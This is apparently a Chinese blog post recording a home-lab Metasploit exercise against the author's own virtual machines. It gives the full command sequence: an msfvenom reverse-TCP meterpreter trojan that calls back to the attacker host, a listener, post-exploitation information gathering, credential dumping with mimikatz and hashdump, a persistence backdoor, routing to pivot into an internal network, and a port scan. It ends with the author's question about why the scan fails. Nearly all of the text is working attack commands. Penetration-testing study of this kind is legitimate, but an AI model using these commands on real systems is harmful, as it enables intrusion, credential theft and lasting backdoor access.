本机win10 192.168.1.109
虚拟机win7 NAT模式 192.168.1.131
攻击机:虚拟机kali 仅主机模式 192.168.10.128
假设攻击机kali已经对win10主机getshell
1.kali生成一个exe木马文件test.exe(这是最简单的木马文件,有杀软就会被杀,若要免杀还要做免杀处理)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.128 lport=4444 -f exe -o test.exe
将test.exe上传到win10主机上
2.msf下使用反弹连接
msfconsole
msf5 > use exploit/multi/handler
3.设置反弹需要的payload
msf5 > set payload windows/x64/meterpreter/reverse_tcp
4.查看配置选项
msf5 > show options
5.设置反弹回来的我们自己的主机IP和端口,开始监听4444端口
msf5 > set lhost 192.168.10.128
msf5 > set lport 4444
msf5 > run
6.目标主机打开木马程序文件payload.exe,得到反弹shell
meterpreter >
7.域信息收集
meterpreter > getuid #获得主机名
meterpreter > sysinfo #获得系统信息
8.信息收集命令
run post/windows/gather/checkvm #是否虚拟机(windows)
run post/linux/gather/checkvm #是否虚拟机(linux)
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks #获取最近的文件操作
run post/windows/gather/enum_ie #获取IE缓存
run post/windows/gather/enum_chrome #获取Chrome缓存
run post/windows/gather/enum_patches #补丁信息
run post/windows/gather/enum_domain #查找域控
9.获取密码
load mimikatz
kerberos
hashdump
10.权限维持
run persistence -i 10 -p 4444 -r 192.168.10.128
11.查看arp表与路由表
arp
route
12.添加路由
run autoroute -s 192.168.43.0/24(内网IP)
run autoroute -p
13.查询端口
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.131
set PORTS 1-4000
set THREADS 50
run
这里有一个问题,我设置了路由转发,但是最后一步端口扫描却无法对win7进行扫描,run了以后就没反应了,一点提示信息都没有,如果有知道的大佬希望能评论指出,感激不尽
来源:https://www.cnblogs.com/rnss/p/11011251.html